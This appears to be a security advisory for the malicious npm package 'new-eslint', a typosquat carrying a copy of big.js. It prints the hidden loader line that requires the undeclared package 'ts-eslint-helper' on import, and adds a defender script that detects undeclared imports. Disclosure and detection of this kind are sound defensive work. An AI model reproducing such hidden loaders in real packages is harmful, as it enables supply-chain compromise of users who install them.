Malicious package

new-eslint (npm)

Malicious code in new-eslint (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6224
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall new-eslint

What this malware does

The package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js with a hidden loader injected mid-file, between P.minus and P.mod, in both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package, and the call silently swallows all errors. The required package ts-eslint-helper is not declared in package.json (the manifest lists a different package, [email protected]), so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: a classic typosquat lure combined with a hidden, remote-controlled loader. Whatever ts-eslint-helper.from_str() does runs in the installer's process on import, with no advertised functionality justifying it.
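
A defender-side check for the pattern described above, added here as an example and not taken from the advisory or from any project it names: it lists bare require/import targets in a package's source files that the package.json does not declare. The function names, the placeholder dependency name and the sample file contents are assumptions constructed for illustration.

```javascript
// Added example: list bare imports that a package's package.json does not declare.
// Resolve node:module whether this file is loaded as CommonJS or as an ES module.
const nodeModule = typeof require === "function"
  ? require("node:module") : process.getBuiltinModule("node:module");
const BUILTINS = new Set(nodeModule.builtinModules);

// Static require("x"), import("x"), import "x" and ... from "x" forms only.
const IMPORT_RE = /\b(?:require|import)\s*\(\s*["']([^"']+)["']\s*\)|\b(?:from|import)\s+["']([^"']+)["']/g;

// "@scope/name/sub" -> "@scope/name", "name/sub" -> "name"
function packageName(spec) {
  const parts = spec.split("/");
  return spec.startsWith("@") ? parts.slice(0, 2).join("/") : parts[0];
}

// manifest: parsed package.json; files: { relativePath: sourceText }
function undeclaredImports(manifest, files) {
  const declared = new Set([manifest.name]);
  for (const key of ["dependencies", "optionalDependencies", "peerDependencies"]) {
    Object.keys(manifest[key] || {}).forEach((name) => declared.add(name));
  }
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    source.split(/\r?\n/).forEach((text, index) => {
      for (const match of text.matchAll(IMPORT_RE)) {
        const spec = match[1] || match[2];
        if (/^(\.|\/|node:)/.test(spec)) continue; // relative, absolute, node: builtin
        const name = packageName(spec);
        if (BUILTINS.has(name) || declared.has(name)) continue;
        findings.push({ file, line: index + 1, module: name });
      }
    });
  }
  return findings;
}

// Constructed sample: the declared dependency is a placeholder and the line numbers
// do not match the real files. LOADER is the line quoted in the advisory.
const LOADER = 'const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });';
const SAMPLE_MANIFEST = { name: "new-eslint", dependencies: { "placeholder-declared-dep": "1.0.0" } };
const SAMPLE_FILES = {
  "big.js": ['const fs = require("fs");', 'const dep = require("placeholder-declared-dep/lib");',
    "P.minus = function (y) { /* ... */ };", LOADER, "P.mod = function (y) { /* ... */ };"].join("\n"),
  "big.mjs": 'import util from "./util.mjs";\n' + LOADER,
};
console.log(undeclaredImports(SAMPLE_MANIFEST, SAMPLE_FILES));
```

The check is static and regex-based, so it misses computed specifiers such as require(variable); a clean result does not clear a package.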

Malicious versions

1 flagged
7.0.5

Indicators of compromise (SHA-256)

6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25

Frequently asked questions

No. new-eslint on npm has been identified as a malicious package (version 7.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007067

Credits

  • Amazon Inspector · finder

new-eslint (npm) malicious package — MAL-2026-6224 | O3 Security